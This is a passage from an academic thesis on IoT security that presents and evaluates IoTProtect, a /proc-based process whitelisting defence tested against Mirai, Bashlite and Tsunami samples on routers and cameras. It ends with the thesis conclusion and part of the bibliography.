256MB RAM

350 MB free disk

N/A

72

[92] space

Symantec Critical

System Protection

5.2 (Agent) [93]

RHEL 5/6

CentOS 5/6

SUSE 8/9/10/11

Solaris 10/11

Oracle 5/6

QNX

IBM AIX 5L

HP Unix 11

WEPOS, 2009/7

WES xp/7

Windows XP/vista/7/8

Windows 2003/2008/2012

256 MB RAM

100 MB free disk

space

Additional

management server

[95]

In addition to the commercial security software, there are many studies that deal with the

protection of low-cost IoT devices [35]. These have deployment costs similar to the commercial

options resulting from required firmware modifications.

6.2. Preliminaries

6.2.1. Linux processes information

Linux is a free OS developed by many companies and groups. The GNU/Linux system is the

core component, which is branched off into many different Linux distributions [96]. Among these

distributions, such as Fedora, Ubuntu, Debian, and Mandriva Linux, there is a common design

called the “proc” filesystem for providing system information to users or applications. This

filesystem is not associated with any hardware device such as disk drives. Instead, “proc” is an

agent into the running Linux kernel. Files in the “proc” filesystem are objects that behave

similarly to normal files but provide access to parameters, data structures, and statistics in the

kernel. The contents of these files are not always fixed, but are generated on the fly by the Linux

73

kernel when the file is read. For embedded Linux systems, users can use open source tools such

as the Yocto Project to produce their distribution [97]. The Yocto tool retains the feature that

supports the “proc” and “sys” filesystems [98]. Therefore, users and applications can read process

information using “proc” on an embedded Linux system as long as the device developers are

willing.

The “proc” filesystem contains a directory entry for each process running on a Linux system.

The name of each directory is the process identifier (ID) of the corresponding process. These

directories appear and disappear dynamically as processes start and terminate on the system. Each

directory contains several entry files providing information regarding the running process [99].

There are three entry files that contain pathname or filename information regarding the binary of

the corresponding process:

l The “exe” file is a symbolic link that points to the executable image running in the process.

l The “maps” file displays the range of addresses in the process’s address space into which

the file is mapped, the permissions on these addresses, the name of the file, and other

information.

l The “cmdline” file records the complete command line for the process unless the process is

a zombie or kernel. In the zombie process, there is nothing in the file [100].

As shown in Fig. 21, users and applications can find the pathname of the running process.

Moreover, if there is a whitelist of benign binaries' pathnames, we can distinguish normal and

abnormal processes.

74

Fig. 21 Format of the maps [100]

6.2.2. Files in IoT devices

In this method, we focus on Linux-based IoT devices because many open-source OS’s for IoT

devices are based on Linux distributions, such as Brillo, OpenWrt, and Ostro Linux [101]. Linux

has a single hierarchical directory structure that starts from the root directory, represented by “/”

and then expands into sub-directories. The Filesystem Hierarchy Standard (FHS) defines the

directory structure and contents in most Linux distributions [102]. However, IoT devices can

apply various storages such as flash storage. This kind of IoT device can contain multiple

filesystems in one device. For example, the ASUS Wi-Fi router RT-AC3200 mounts nine

filesystems, according to the “/proc/mounts” file shown in Fig. 22. The format and meaning of

each line are as follows [100] [103]:

1. The first field specifies the device that is mounted.

2. The second field specifies the mount point.

3. The third field specifies the filesystem type.

4. The fourth field describes whether the filesystem is mounted read-only (ro) or read-write

(rw).

5. The fifth field is used by the “dump” command to determine which filesystems are to be

75

dumped.

6. The sixth field is used by the “fsck” command to determine the order in which filesystem

checks are performed at boot time.

Fig. 22 Filesystems of ASUS Wi-Fi router RT-AC3200

The “rootfs” filesystem is a simple filesystem that exports Linux's disk caching mechanisms as

a dynamically resizable random access memory (RAM)-based filesystem [104]. “Squashfs” is a

compressed read-only filesystem for Linux and is intended for general read-only filesystem use,

for archival [105]. “Devtmpfs” permits the kernel to create an instance called “devtmpfs” very

early at kernel initialization. Every device will provide a device node in “devtmpfs” before any

driver-core device is registered. “Devtmpfs” can be changed and altered by users at any time [106].

The “proc” filesystem contains system information, and the files in “/proc” are generated by the

kernel on the fly [99]. The “tmpfs” filesystem is a temporary file storage facility on many Unix-

like operating systems. It does not use traditional non-volatile media to store file data; instead,

“tmpfs” files exist solely in a virtual memory maintained by the UNIX kernel [107]. “Sysfs” is a

pseudo filesystem provided by the Linux kernel that exports information regarding various kernel

subsystems, hardware devices, and associated device drivers [108]. “Devpts” is a virtual

filesystem available in the Linux kernel since version 2.1.93 (April 1998). It is usually mounted

76

at /dev/pts and contains solely device files representing slaves to the multiplexing master located

at /dev/ptmx [109]. “JFFS2” is a log-structured filesystem designed for use on flash devices in

embedded systems. It is based on the work begun in the original JFFS by Axis Communications,

AB [110]. The “usbfs” filesystem is a dynamically generated one, similar to the “proc” filesystem.

“Usbfs” complements the normal device node system and can be used to write user space device

drivers [111].

Based on the privileges and features of these filesystems, we categorize three kinds of files in

Linux-based IoT devices:

l Writable files

l Read-only files

l On-the-fly files

Writable files are those that come from user-writable filesystems. Most of them are the

input/output (I/O) of systems or configuration files. A read-only filesystem comes from some

mounted image or read-only filesystems. The files are libraries and applications for creating the

functions and services of IoT devices. On-the-fly files are the files that are in the “proc” or “usbfs”

filesystems, are in the kernel, or are generated dynamically by users. The whitelist criteria are

simple. First, ignore on-the-fly files because they are system information entries or mounted by

USBs outside the device. Secondly, create the whitelist of pathnames by read-only files. There

are many libraries and executable files in a read-only filesystem. Finally, create the whitelist of

hashing values by writable files. For example, there are 14,514 files in the ASUS RT-AC3200

Wi-Fi router. The distribution of the files is shown in Fig. 23. Of these files, 79% are on-the-fly

files generated by the kernel. Therefore, the number of files to be whitelisted is only 3,048.

77

Fig. 23 Distribution of ASUS RT-AC3200 files

6.2.3. Major premises of IoTProtect

We assume that IoTProtect is implemented by the device developers and uses the whitelists

they created. There are four conditions. First, the checker and whitelists must be merged into the

kernel or executed in the initial process to prevent attackers or malware from killing the checker

process. Second, we assume that the developers do not use the “mmap” function to produce

anonymous mappings. There is a case when the pathname fields of maps in “/proc” are blank.

This is an anonymous mapping as obtained via the “mmap” function of the C language. There is

no easy means of coordinating this back to a process's source, as there is no field giving the

pathname [100]. Therefore, this is a constraint under which the developers must develop their

devices in order to implement IoTProtect. More precisely, when loading files into memory, they

must not set the "MAP_ANONYMOUS" argument for creating memory mappings. Third, the exe

files in “/proc” can sometimes lose the links to the pointed files. Under Linux 2.2 and later, the

exe files in “/proc” are a symbolic link containing the actual pathnames of the executed commands.

Attempting to open an exe file will indeed open the original executable. However, this symbolic

link can typically be dereferenced. If the pathname has been unlinked, the symbolic link will

78

contain the string '(deleted)' appended to the original pathname. In a multithreaded process, the

contents of this symbolic link are not available if the main thread has already been terminated

[100]. Developers must not dereference the exe link to create hash values of the executable

binaries. Moreover, the hash algorithm must be available on the IoT device. Note that we use

MD5 for the actual implementation of IoTProtect tested in the following evaluation. Fourth, if the

developer would like to apply whitelists of cmdline content, the libraries and application files

must be allocated in read-only partitions. Furthermore, the full or unique pathname of the

corresponding binaries must be included in the command line to prevent file replacement or false

positives.

6.3. IoTProtect

IoTProtect is a whitelisting method for protecting low-cost IoT devices. IoTProtect consists of

three whitelists and a checker program. The pathname whitelist is a list of pathnames of all

legitimate executables. The hash value whitelist records MD5 hash values of binaries on IoT

devices. The comparison and whitelist of cmdline content are optional and performed only if there

are processes that cannot display their pathname and exe links in the “proc” filesystem.

We first explain the creation of whitelists. Here we assume that the device to be protected has

already been developed and that the device developer is to install IoTProtect on top of the existing

system. We skip the files coming from on-the-fly filesystems, such as sysfs, proc, usbfs, and I/O

files. If developers know precisely which executable files to include on the whitelist, they can

create their own whitelist manually. However, recent IoT device products are often not developed

by a single manufacturer, and each developer does not know all of the legitimate executables

exactly. In such a case developers can still create whitelists that include all executables existing

in the system by using the Linux command “find” with the “-exec” expression and “md5sum.”

79

Moreover, the cmdline whitelist can be created by “find” with the “-exec” expression and “cat”

Linux commands.

IoTProtect conducts process checks through the following steps. The input data come from

entry files of the “proc” filesystem and whitelists. The output is the removal of malicious

processes. The notations used in the pseudocode are shown in Table 28.

Table 28 Table of symbols.

Notations Definitions and Descriptions

T Integer variable, the period of process checker

N Integer variable, number of processes to be checked

M Set of /proc/[pid]/maps files

Cmd Set of /proc/[pid]/cmdline files

CL Set of cmdline

PN Set of pathnames

WLP, H, C Whitelists of the pathname, hash value, and cmdline

Pn1, Pn2 Entity of pathname

Pid1, Pid2 Entity of process id

E1, E2 Entity of exe links

H1, H2 Entity of hash value

SP Set of suspicious process id

Cl1, Cl2 Entity of cmdline content

MD5 (Ei) Calculate the MD5 hash value of the linked binary

Comp (S,

WL)

Comparison of set S and whitelists

Kill (S) Kill the process of set S by its Pid

Sleep (t) Pause process checker of IoTProtect for t seconds

← Assignment

- Remove entities from the set

A, B, C, D Sets

|D| Size of set ‘D’

80

We explain the details of the IoTProtect procedures with the following pseudocode:

1. while true

2. find and grep Pni from M, i = 1 to n

3. PN ← {Pn1, Pn2, …, Pnn}

4. Comp (PN, WLP)

5. SP ← {Pid1, Pid2, …, Pidj} ∀Pidi ∈ A: Pni ∉ WLP, i = 1 to j

6. Hj ← MD5(Ej) ∀Ej ∈ B: Pidi ∈ SP, j = 1 to |SP|

7. H ← {H1, H2, …, Hj}, j = 1 to |SP|

8. Comp (H, WLH)

9. SP–{Pid1, Pid2, …, Pidk} ∀Pidk ∈ C: Hk ∈ WLH

/*optional step of cmdline whitelisting */

10. find and grep Cli from Cmd, i = 1 to n

11. CL ← {Cl1, Cl2, …, Cli}, i = 1 to n

12. Comp (CL, WLC)

13. SP–{Pid1, Pid2, …, Pidr} ∀Pidr∈D: CLr∈WLC

/*optional step of cmdline whitelisting */

14. Kill(SP)

15. Sleep(t)

16. Endwhile

IoTProtect first filters processes that are not included in the pathname whitelist, and then filters

the remaining processes according to the hash value whitelist. It then filters the remainder with

81

the cmdline whitelists if there are any processes with no pathname and exe links. Finally, it

removes all remaining processes.

6.4. Evaluation

We developed a prototype of IoTProtect using shell scripts with Linux commands and AWK

scripts, such as grep, find, and head. We conducted experiments with four actual IoT devices and

4,981 malware binaries captured by our IoT honeypot for evaluation. We show three different

experiments to evaluate the effectiveness and overhead of IoTProtect.

6.4.1. Data collection and experimental devices

We chose four IoT devices for conducting experiments. These devices were known to be

vulnerable and compromised by IoT malware [112] [113] [114]. The brands and specifications of

the devices are listed in Table 29. According to their disk information, previous commercial

products cannot be installed on the four devices. The Dahua IPC-HFW3300 does not support

MD5 hash libraries. Therefore, IoTProtect checks only the pathnames and cmdline of

corresponding processes in the IP Camera.

Table 29 IoT devices used in conducting the experiments.

IoT

Device

Model CPU

Arch.

CPU

spec.

RAM

(MB)

Disk

(MB)

Appr.

Price

Dahua

IPC-HFW3300

IP

Camera

ARM 300

MHZ

92 8 325

USD

ASUS

RT-AC3200

Wi-Fi

Router

ARM 1GHz

2cores

256 30.8 199.99

USD

ASUS

RT-N66U

Wi-Fi

Router

MIPSEL 600

MHZ

256 22.3 84.99

USD

PRINCETON

ShAirDisk

Wi-Fi

storage

MIPSEL 360

MHZ

28 4.6 26.7

USD

82

IoTPOT collected 4,981 different IoT malware binaries for ARM and MIPSEL from January

2016 to March 2017. The malware labels, such as Bashlite, Tsunami, and Mirai, come from local

scans by Kaspersky, an anti-virus engine. We consider Kaspersky, from our previous experience

of submitting 12,000samples to the Virustotal web service application programming interface

(API), to be one of the most reliable anti-virus products for IoT malware [115]. VirusTotal is a

website that aggregates many antivirus products and online scan engines [116]. The distribution

of our malware samples is shown in Table 30.

Table 30 IoT malware used for conducting the experiments.

CPU Bashlite Tsunami Mirai sum.

ARM 3123 51 74 3248

MIPSEL 1514 27 192 1733

All 4637 78 266 4981

6.4.2. Removal experiment

6.4.2.1. Design of experiment

We conducted experiments involving the malware removal process on the four IoT devices as

follows:

1. Login to the device as root via telnet.

2. Download malware using the “wget” or “tftp” command.

3. Assign the “755” privilege to the malware binary.

4. Execute the downloaded malware.

5. Conduct a process check using IoTProtect

6. Check whether IoTProtect can kill the malware process.

83

6.4.2.2. Experimental Results

The results are shown in Table 31. We see that there are many segmentation faults (7% to 14%)

and bus errors (0% to 0.8%) when we execute the malware binaries on these devices. There are

two ARM malware binaries and one MIPSEL binary that finished execution before we started

process checks of IoTProtect. These three malware binaries are similar and contain the same

functions in their binaries. All they attempted was to install python on target devices using “apt-

get” and “yum.” When the installation failed as a result of the installation utilities not being

available on these devices, the malware simply terminated. The complete execution of the

malware takes less than one second, and the process disappeared after termination. The purpose

of the malware is to infect an IoT OS that can install python, such as the IBM Watson IoT Platform

[117]. IoTProtect successfully removed the processes of all but three of the malware binaries. The

success rate of removal by IoTProtect against triggered malware was 99.92% if the above three

cases are considered as failed protection, but was 100% if they are considered as successful

protection because the malware could not function properly.

Table 31 Results of the removal experiments.

IoT Devices model CPU

Arch.

Kill Segmentat

ion fault

bus error fail

IPC-

HFW3300

IP Camera ARM 2774 446 26 2

RT-AC3200 Wi-Fi

Router

ARM 2732 483 31 2

RT-N66U Wi-Fi

Router

MIPSEL 1608 123 1 1

ShAirDisk Wi-Fi

storage

MIPSEL 1622 108 2 1

84

The overheads of IoTProtect on the four devices are shown in Table 32. The disk overheads

include the sizes of whitelists. The size of the IoTProtect checker program is only 1.6 kB. Our

pathname whitelist includes all of the pathnames from the read-only filesystem. The manufacturer

of a device might use a more efficient whitelist. The central processing unit (CPU) overheads are

the maximum values during execution time. The three devices other than the IPC-HFW3300 can

finish a process check of IoTProtect in four seconds. Despite the fact that the IP Camera spent 44

seconds executing the checker program, the original monitor and display systems of the camera

functioned normally without delays.

Table 32 IoTProtect overheads.

IoT

Devices

Model Disk

overhead

CPU

overhead

Time

cost

IPC-

HFW3300

IP

Camera

124.5K 24% 44 sec

RT-

AC3200

Wi-Fi

Router

288.4K 7% 2 sec

RT-N66U Wi-Fi

Router

176.5K 17.6% 2 sec

ShAirDisk Wi-Fi

storage

155.5K 19% 4 sec

6.4.3. Mitigating outgoing attacks

In reality, IoTProtect would continuously check existing processes in some designated time

interval. Therefore, it is important to ask whether IoTProtect is sufficiently fast to kill a malware

process before it conducts outgoing attacks against other devices. To measure the worst case, we

chose a Mirai variant, one of the fastest spreading IoT worms, which conducts a telnet scan on

85

port 2323/tcp right after its execution before even connecting its command-and-control server.

The MD5 hash value of the sample is “d6e99a59d44b83e8360745145fa5d2b3.”

6.4.3.1. Design of experiment

As shown in Fig. 24, we conducted the experiment on the ASUS RT-AC3200 Wi-Fi Router.

All traffic is contained in a LAN network. At the beginning of the experiment, we executed

malware. After a fixed interval, we executed IoTProtect to conduct a process check. To simulate

different detection timings, we started the process check of IoTProtect at one, five, ten, 20, 30,

and 60 seconds after malware execution, respectively. We then measured how many packets went

out from the devices before the IoTProtect checker killed the malware process. We conducted this

trial 100 times for each setting.

Fig. 24 Experimental environment for measuring outgoing attack mitigation by IoTProtect

86

6.4.3.2. Experimental results

The results of the experiment are illustrated in Fig. 25. Those results confirm that IoTProtect

cannot block every scan by Mirai but does reduce the number of scan packets significantly.

Measurement shows that this Mirai variant generates nearly 2,000 scan packets for one minute

after it begins its execution and would continue to scan at the same rate if it were not killed by

IoTProtect.

Fig. 25 Results of experiment on mitigating outgoing attacks

6.4.4. Trade-off between security and device performance

We measured the impact of IoTProtect on the performance of the devices. We chose a low-cost

device, ShAirDisk, and analyzed the trade-off between the security and overhead of IoTProtect.

6.4.4.1. Experimental design

As illustrated in Fig. 26, we conducted this experiment in a location at which there were no

other Wi-Fi access points. Then, we uploaded a 200 MB file five times into Wi-Fi storage to

measure the device performance for uploading files. We conducted this experiment under two

conditions, one with only IoTProtect running and the other with IoTProtect and malware running.

87

The same procedure as in the previous experiment was followed for malware execution. The MD5

hash of the Mirai variant used for this experiment is “018cb18e9cb415af453ee020fa33aa28.”

Fig. 26 Experimental environment for measuring the trade-off between performance and security

6.4.4.2. Experimental results

Fig. 27 presents the different upload time costs under different intervals of IoTProtect. In the

figure, the values of the blue bars are the average upload times in a situation with only IoTProtect.

The values of the orange bars are the average upload times in the situation in which both malware

and IoTProtect are executed. We can see that the differences between the orange and blue bars in

the same interval are not significant, measuring less than 12.4 seconds. This means the malware

infection caused a limited delay of fewer than 12.4 seconds of file upload time. However, if we

shorten the interval of IoTProtect process checks to 1.0 second to increase security, the overhead

increases significantly, measuring a 55% increase in upload time compared to the case without

IoTProtect. On the other hand, we can also see that intervals of more than 30 seconds do not harm

performance significantly.

88

Fig. 27 Results of experiment measuring trade-off

6.4.5. Evaluation of easy deployment

The deployment of IoTProtect involves two steps, the creation of whitelists and the

installation of the IoTProtect checker. We create worst-case whitelists as we are not the developers

of these devices. These whitelists can filter out only “sysfs,” “proc,” “usbfs,” f, and I/O files. The

time costs are shown in Table 33. General users can quickly create worst-case whitelists in only

a few minutes.

Table 33 Cost of creating whitelists.

IoT Devices model whitelists

size

whitelists time

cost

IPC-HFW3300 IP Camera 123.0K *29 sec

RT-AC3200 Wi-Fi Router 285.9K 218 sec

RT-N66U Wi-Fi Router 175.0K 157 sec

ShAirDisk Wi-Fi storage 154.0K 188 sec

*This IP camera lacks hash libraries and contains some processes without pathname and valid exe links.

89

We created the cmdline whitelist instead of hash value whitelists.

The installation procedure for the IoTProtect checker is very light and quick. The checker

program is written using Bash scripts, leading to portability between different Linux distributions.

Moreover, the fact that the size of the checker program is only 1.5KB resulted in easily

deployment on low-cost IoT devices. Finally, the installation procedures of this program include

only a copy of a file and assignment of the execute privilege. The checker script was executed

independently of most Linux kernel modules. Users can easily invoke it in the Linux startup

process and have it run in the background or as a daemon.

6.5. Discussion

From the removal experiment, we see that our method applies to different CPU architectures

and models of IoT devices. Furthermore, IoTProtect successfully removed several thousand

different malware processes with nearly 100% success. According to the mitigation of outgoing

attacks, IoTProtect reduced the scan attack traffic caused by a rapidly spreading Mirai variant,

even if the process check is not very frequent. The results of the performance experiment show

that IoTProtect can be installed in some low-cost devices without a significant drop in

performance if the process checking interval is configured appropriately.

We found that IoTProtect was significantly slow when implemented in one of the tested devices,

the Dahua IP Camera, as shown in Table 31. We could improve the performance of IoTProtect by

implementing it in the C language and by reducing the size of the whitelists. According to a

comparative study of programming languages in 2015, C is the best language for computing-

intensive tasks [118]. Moreover, the whitelists we created for the experiments in the worst case

contain thousands of pathnames and MD5 hashing values. Manufacturers can build much better

whitelists for their products.

90

For mitigating outgoing attacks, we find that IoTProtect cannot block all outgoing scan packets.

It can remove the malware process, but the malware has already conducted thousands of scan

packets before it is killed. We consider this shortcoming to be a limitation of IoTProtect. If we

shorten the interval of IoTProtect’s process checks from 60 seconds to 20 seconds, 66% of scan

packets can be reduced. Moreover, an interval of one second could stop 96.72% of the scan

packets that could have been sent out in one minute. Note that we used a Mirai variant, one of the

fastest known IoT worms that begins scanning right after execution as the worst-case scenario.

However, most Mirai malware would connect the command-and-control server first and then start

the scan and DoS attack after receiving commands. Hence, in most real cases, IoTProtect could

have blocked most of the outgoing attacks within an acceptable time interval.

Our performance experiment on Wi-Fi storage shows that the file upload speed of the device is

significantly affected by the interval of IoTProtect’s process check. On the tested Wi-Fi storage

devices, the best interval can be 20 to 30 seconds, which will introduce a 7.1% to 12.4% increase

in file upload time while protecting from and mitigating most of the attacks by the malware

infection, as discussed above.

IoTProtect is easy to deploy, but creation of the proper whitelists can take some effort.

Supposing that the developers use some third-party libraries and an open source OS for their IoT

products, they might know only the processes caused by their own applications and have limited

information for all of the other benign processes. In such a case, the developers must pick up all

execution files installed in the device, such as the files in “/bin’ and “/usr/bin,” as we did in the

experiment. When they conduct a software testing process, they must record all of the created

processes to avoid false positive detection by IoTProtect.

91

6.5.1. Comparison with previous studies

l The method by Paleari et al. must apply QEMU and behavior clustering [32], which are too

expensive to implement on low-cost devices.

l Shahzad et al. analyzed 11 features from the kernel and achieved 93% detection accuracy

[33]. However, the system requests many features, executes a decision tree algorithm, and is

difficult to install on low-cost devices. IoTProtect, in contrast, was able to remove 99.92%

of malware processes from four thousand malware binaries. We assume here that our method

does not cause false positives as long as the whitelist is created appropriately by the device

developers. However, as discussed in the previous section, the creation of whitelists can

involve difficulties during the manufacturing process. Our future work will include

investigating proper whitelisting.

l Tamiya et al. investigated a simple solution for malware removal by rebooting the device,

which can be applied to low-cost IoT devices [34]. However, they do not offer the detection

methodology of the malware infection, and they also mention that the connected vulnerable

devices would again be infected after removal unless the vulnerability is fixed. Therefore,

their solution would not be able to defend the device.

l There are platform and resource constraint issues for McAfee Embedded Control 6.x. These

solutions cannot be installed on low-cost IoT devices. Moreover, McAfee Embedded Control

6.x must rebuild the kernel when installed on a Linux distribution, introducing significant

engineering cost, especially if deployed on existing commercial products.

l Koike et al. developed a whitelisting-type execution control module “WhiteEgret” on Linux

[35]. Similarly to McAfee Embedded Control, WhiteEgret also builds the Linux kernel upon

installation, also introducing substantial engineering cost.

92

6.5.2. Limitations

IoTProtect does have some limitations. Many of the limitations come from the design of Linux

process information and our whitelisting idea. First, IoTProtect depends on exe and maps entries

in the “proc” filesystem. Kernel-level malware and toolkits that disable or alter these

functionalities would evade detection by IoTProtect. Moreover, checks and removal by

IoTProtect are performed on filesystems, with the result that code injection on a legitimate process

in memory cannot be detected.

Second, the defense offered by IoTProtect is not prevention but mitigation of malware infection.

It would help substantially in defending against long-lasting malicious activities such as DDoS,

spamming, bitcoin mining, click fraud, and stepping stones for other attacks. On the other hand,

attacks that can be performed in a very short time, such as credential and privacy data exfiltration,

might not be mitigated well. Applying a whitelist before malware execution would require process

creation hooking. We did not choose this approach for two reasons. First, the hooking of process

creation would involve modification of the Linux kernel [119] and hence increase the deployment

cost for device developers. We believe that IoTProtect is easier to implement and use than the

hooking method. Second, hooking every process creation and checking all created processes

before they are executed would slow down the principal functionality of the devices, especially

at the time of device boot-up when many processes are created and checked.

For new IoT devices, developers can select and build their secure OS distribution. However,

changing an OS against existing devices is not easy. First, extending the resources of a device is

difficult; if the RAM, CPU, or hard disk is insufficient, a secure OS cannot be installed on the

devices. Second, changing the OS would require manufacturers to re-examine device test cases.

Testing cases that include stability or burn-in testing, i.e., running devices with different voltages

for several months, would consume substantial labor and time. Third, some Linux secure modules

93

are kernel space programs applying a whitelist mechanism. Such modules affect the activation of

all kernel and user space applications. Installing the module led to rebuilding the OS kernel and

re-examining all kernel and user space applications. IoTProtect is a user space application.

Therefore, developers and manufacturers need examine only the user space applications, e.g., user

applications cannot kill kernel processes. According to a Gartner report, there are more than 8.4

billion connected IoT devices in use worldwide since 2017 [1]. Moreover, most of these devices

lack defense mechanisms. IoTProtect is a simple solution for them with lower development and

testing costs.

There are four major conditions that a developer must follow in order to deploy IoTProtect as

described in Section 6.2.3. These can be the constraints for device developers. In addition, if the

conditions are not satisfied by existing devices, this might require additional effort to modify the

firmware, thereby limiting the advantage of easy deployment. We can at least say that these

conditions are satisfied for the four existing devices we tested.

94

Chapter 7.

Conclusion and future works

7.1 Conclusion

In recent years, the cyber threat against IoT has become a reality. Mirai Botnets executed the

massive distributed denial of service (DDoS) attack against Dyn DNS in 2016. The report from

Kaspersky in Sept. 2018, shows Mirai is still the most popular IoT malware family for

cybercriminals (20.9%). Besides, the IoT malware keeps evolving and exploits multiple

vulnerabilities to infect IoT devices. Since May 2018, the Mirai and Bashlite malware families

that assimilate many known exploits affecting the Internet of Things (IoT) devices. These exploits

come from 11 makers' devices over HTTP, UPnP, Telnet, and SOAP protocols. Hence the

observation tool of cyber attacks in IoT should be reconsidered and evaluated. For observation of

these complicate attack vectors, we applied physical IoT devices to build the honeypot. However,

physical IoT devices bring challenges to management and information leak problems.

In chapter 3, we introduce frequent cyber attacks against IoT. Also, then we describe an

observation and analysis framework and countermeasure of cyber attacks in IoT. First is

techniques to support honeypot consisted of physical IoT devices. The MITM proxy can control

incoming and outbound traffic of the honeypot, filter out unwanted attack flow, and prevent

information leak. Second is techniques of analyzing massive data of IoT honeypot. We apply text-

mining and machine learning algorithms to find new attack vector and categorized known Botnets'

attacks. The third is a whitelisting-based countermeasure against cyber attacks in IoT. Moreover,

we showed how to protect the IoT devices in the honeypot from unwanted cyber attacks. Also,

we present how to create an appropriate view which analyzes the incoming data in depth and

utilize our resource efficiently. Finally, we showed a method to recognize the IoT malware process

95

by examining the pathname and binaries hash value hidden in "/proc" folder.

In chapter 4, we combine the ability of the transparent proxy and web tracking library, develop

a supporting mechanism for honeypot consisted of physical IoT devices. ThingGate can improve

the security of honeypot, extend the functionality of web tracking, manage the incoming traffic,

and output response content via MITM way. We evaluated ThingGate on the public internet, prove

the effectiveness of ThingGate. In our observation, ThingGate did not yield the cyber attacks

against physical devices, such as RCE attack and long term peeping. In our experimental result,

we successfully track a USA attacker use multiple IP addresses visit our honeypot. To handle the

unwanted incoming flow, we prove that ThinkGate can block traffic which change critical

configuration. Moreover, ThingGate collected 149 malware binaries and 23 scripts from 411

misplaced CI-URL, which employed seven vulnerabilities. Furthermore, ThingGate fooled seven

clients who requested the Wi-Fi AP list in WebUI with fabricated AP.

In chapter 5, we analyzed 22.9GB Telnet log and 5616 different malware binaries collected by

IoT honeypot. We filtered 2.7millions infection logs and mapping to 44,834 ECTs. And conduct

classification and clustering analysis on the ECTs. The confusion tables and the accuracy of our

classification method led to several definite conclusions. First, the lowest accuracy of all the ECTs

was 0.9675, indicating that even for a dataset spanning nine months, our method remained valid.

Although command sequences can change many times, the use of trigram features can accurately

distinguish Mirai, Bashlite, and Hajime malware, based on differences in their infection command

patterns. These malware categories have distinctive command patterns, and the hidden feature

can be extracted for further analysis. Second, we demonstrated that using clustering with a trigram

sequence can detect variant attack patterns (for example, wget DoS attack) and facilitate

identification of similarities between different malware families, without requiring the collection

of malware binaries.

96

In chapter 6, we have shown that IoTProtect is a valid solution that can remove IoT malware

processes with reasonable implementation and resource costs. Moreover, we implemented a shell

script prototype and showed that it could be executed successfully on low-cost IoT devices, such

as Wi-Fi routers and storage, with marginal cost. We tested more than four thousand different IoT

malware binaries, and IoTProtect removed 99.92% of these malicious processes successfully.

7.2. Future works

The cyber attacks in IoT keep evolving and diverse purposes. In this study, we use honeypots

to observe existing attacks, analyze threats, and to reflect it to implement a whitelist-based

protection method. We think that extending the observation scope for more protocols and deeper

local area networks (LAN) is essential. The knowledge that obtains from honeypots and analysis

can also be utilized to protect the devices in a proactive way, such as IDS or early-warning system

to detect newly evolving attacks. Thus, future works should focus on how to implement advanced

honeypots and network-based countermeasures against cyber attacks in IoT.

97

Bibliography

[1] L. J., Rivera, and L., Goasduff, "Gartner says a thirty-fold increase in internet-connected

physical devices by 2020 will significantly alter how the supply chain operates," Gartner,

https://www.gartner.com/newsroom/id/2688717, accessed Jan. 18. 2019.

[2] P., Loshin, “Details emerging on Dyn DNS DDoS attack, Mirai IoT botnet,” TechTarget

network, http://searchsecurity.techtarget.com/ news/450401962/Details-emerging-on-Dyn-

DNS-DDoS-attack-Mirai-IoT-botnet, accessed Feb. 06. 2019.

[3] R, Nigam, “Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns,” Unit42,

https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-

campaigns/, accessed Feb. 06. 2019.

[4] Y.M.P., Pa, S., Suzuki, K., Yoshioka, T., Matsumoto, T. Kasama, and C., Rossow, “IoTPOT:

A Novel Honeypot for Revealing Current IoT Threats,” Journal of Information Processing,

Vol.24, No.3, pp.522–533, 2016.

[5] J. D., Guarnizo, A., Tambe, S. S., Bhunia, M., Ochoa, N. O., Tippenhauer, A., Shabtai, & Y.,

Elovici, “Siphon: Towards scalable high-interaction physical honeypots,” In Proceedings of

the 3rd ACM Workshop on Cyber-Physical System Security, pp. 57-68, April, 2017.

[6] T., Luo, Z., Xu, X., Jin, Y., Jia, & X., Ouyang, "Iotcandyjar: Towards an intelligent-

interaction honeypot for iot devices." Black Hat, 2017.

[7] Y., Ezawa, K., Tamiya, S., Nakayama, Y., Tie, K., Yoshioka, and T., Matsumoto, “An

Analysis of Attacks Targeting WebUI of Embedded Devices by Bare-metal Honeypot,” In

Computer Security Symposium 2017, Oct., 2017.

[8] M., Kuzin, Y., Shmelev, and V., Kuskov, "New trends in the world of IoT threats," AO

Kaspersky Lab, https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/,

accessed Feb. 6. 2019.

98

[9] Carnegie Mellon University. "The ‘Only’Coke Machine on the Internet,"

https://www.cs.cmu.edu/~coke/history_long.txt, accessed Feb. 6. 2019.

[10]R.S., Raji, "Smart networks for control." IEEE spectrum 31, no. 6 (1994): 49-55.

[11]K., Ashton, "That ‘internet of things’ thing." RFID journal22, no. 7 (2009): 97-114.

[12]H., Eero, J., Grönvall, and K., Främling. "Tracking and tracing parcels using a distributed

computing approach." Proceedings of the 14th Annual conference for Nordic researchers in

logistics (NOFOMA'2002), Trondheim, Norway. 2002.

[13]E., Dave. "The internet of things: How the next evolution of the internet is changing

everything." CISCO white paper 1, no. 2011

[14]R., Puri, "Bots &; Botnet: An Overview," SANS Institute. https://www.sans.org/reading-

room/whitepapers/malicious/bots-botnet-overview-1299, accessed June. 20. 2019.

[15]A. Tellez, “Bashlite,”, GitHub, https:// github.com/anthonygtellez/BASHLITE, accessed

Jan. 18. 2019.

[16]A., Manos, T., April, M., Bailey, M., Bernhard, E., Bursztein, J., Cochran, Z., Durumeric et

al. "Understanding the mirai botnet." In 26th USENIX Security Symposium (USENIX

Security 17), pp. 1093-1110. 2017.

[17]K., Tamiya, Y., Ezawa, Y., Tie, S., Nakayama, K., Yoshioka, and T., Matsumoto,

"Observation of Peeping using Decoy IP Camera," In Symposium on Cryptography and

Information Security 2018, Jan., 2018.

[18]T. F. Yen, V. Heorhiadi, A. Oprea, M. K. Reiter, and A. Juels, “An epidemiological study of

malware encounters in a large enterprise,” In Proceedings of the 2014 ACM SIGSAC

Conference on Computer and Communications Security, ACM, pp. 1117-1130, 2014.

[19]M. M. Masud, L. Khan and B. Thuraisingham, “A scalable multi-level feature extraction

technique to detect malicious executables,” Information Systems Frontiers, vol. 10, no. 1,

99

pp. 33-45, 2008.

[20]M. Ahmadi, D. Ulyanov, S. Semenov, M. Trofimov, and G. Giacinto, “Novel feature

extraction, selection and fusion for effective malware category classification,” In

Proceedings of the Sixth ACM Conference on Data and Application Security and Privacy,

ACM, pp. 183-194, 2016.

[21]J. Drew, T. Moore, and M. Hahsler, “Polymorphic Malware Detection Using Sequence

